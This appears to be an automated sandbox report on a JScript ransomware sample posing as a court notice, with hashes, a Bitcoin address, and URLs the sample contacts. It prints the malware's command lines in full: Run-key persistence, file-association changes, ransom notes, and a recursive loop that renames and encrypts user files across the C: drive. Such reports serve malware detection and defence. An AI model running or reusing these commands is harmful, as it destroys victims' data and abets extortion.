Analysis
- max time kernel: 141s
- max time network: 140s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 15-01-2021 15:50
Static task: static1
Behavioral task: behavioral1
- Sample: Notice_to_Appear_00614075.doc.js
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: Notice_to_Appear_00614075.doc.js
- Resource: win10v20201028
General
- Target: Notice_to_Appear_00614075.doc.js
- Size: 37KB
- MD5: f84c5242741ccd7949762ca5cbb96556
- SHA1: 894c726e0a3e8cf3fd98690c27f885c4aa775775
- SHA256: aa5b2a6a2711cde023d91112c0574f121b4edd6c8b62409155e75d36f38b0bb6
- SHA512: 5f5716fdf73bd38f28e36cf2d8dc5a8b8ec613a3665e43e5103206fb1bc9f32ad8a44c40cea9cf037f609ad33579569b86c8fd2002832d1daf63218e27feab71
Malware Config
Extracted: C:\Users\Admin\AppData\Local\Temp\a.txt
- 16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
- http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
- http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
- http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
- http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
- http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes: wscript.exe
  flow 8, pid 1676, process wscript.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes: reg.exe
  Key created: \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" (reg.exe)
- Modifies registry class (7 IoCs)
  Processes: reg.exe, reg.exe
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" (reg.exe)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted (reg.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" (reg.exe)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command (reg.exe)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted (reg.exe)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell (reg.exe)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open (reg.exe)
- Suspicious use of WriteProcessMemory (27 IoCs)
  Processes: wscript.exe, cmd.exe, cmd.exe, cmd.exe
  Columns: description / pid / process / target process (each entry below is recorded three times in the report, 9 x 3 = 27)
  PID 1676 wrote to memory of 1500 / 1676 / wscript.exe / cmd.exe
  PID 1676 wrote to memory of 916 / 1676 / wscript.exe / cmd.exe
  PID 1676 wrote to memory of 760 / 1676 / wscript.exe / cmd.exe
  PID 1676 wrote to memory of 1892 / 1676 / wscript.exe / cmd.exe
  PID 1676 wrote to memory of 1092 / 1676 / wscript.exe / cmd.exe
  PID 1676 wrote to memory of 292 / 1676 / wscript.exe / cmd.exe
  PID 1500 wrote to memory of 692 / 1500 / cmd.exe / reg.exe
  PID 916 wrote to memory of 1756 / 916 / cmd.exe / reg.exe
  PID 760 wrote to memory of 1176 / 760 / cmd.exe / reg.exe
Processes
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_to_Appear_00614075.doc.js
  Signatures: Blocklisted process makes network request; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe
      Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
      Signatures: Adds Run key to start application
  - C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe
      Command line: REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
      Signatures: Modifies registry class
  - C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\reg.exe
      Command line: REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
      Signatures: Modifies registry class
  - C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"
  - C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"
  - C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" mxc36lc5c34xiz6wgbdwc880si5ev536hr1l)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\a.txt
  MD5: 31ff92435ec51fab9b7ba2ed4c15dd3e
  SHA1: 696a564dde590c05ad07c16357304fe1c9b25710
  SHA256: b5aec39215b6000a55dca8f51e96338deb950d5d29796eae1683acb6740cb143
  SHA512: 7066800f4473fe6937ea28e8885aded0db866a5c2c9eb1a8bb4473ea4b069cb54bd87b48f060b32cdaac884f42c0e32360999386426ba0e8752c53dbf8da39f6
- memory/292-8-0x0000000000000000-mapping.dmp
- memory/692-9-0x0000000000000000-mapping.dmp
- memory/760-5-0x0000000000000000-mapping.dmp
- memory/916-4-0x0000000000000000-mapping.dmp
- memory/1092-7-0x0000000000000000-mapping.dmp
- memory/1176-11-0x0000000000000000-mapping.dmp
- memory/1292-2-0x000007FEF7080000-0x000007FEF72FA000-memory.dmp (Filesize: 2.5MB)
- memory/1500-3-0x0000000000000000-mapping.dmp
- memory/1756-10-0x0000000000000000-mapping.dmp
- memory/1892-6-0x0000000000000000-mapping.dmp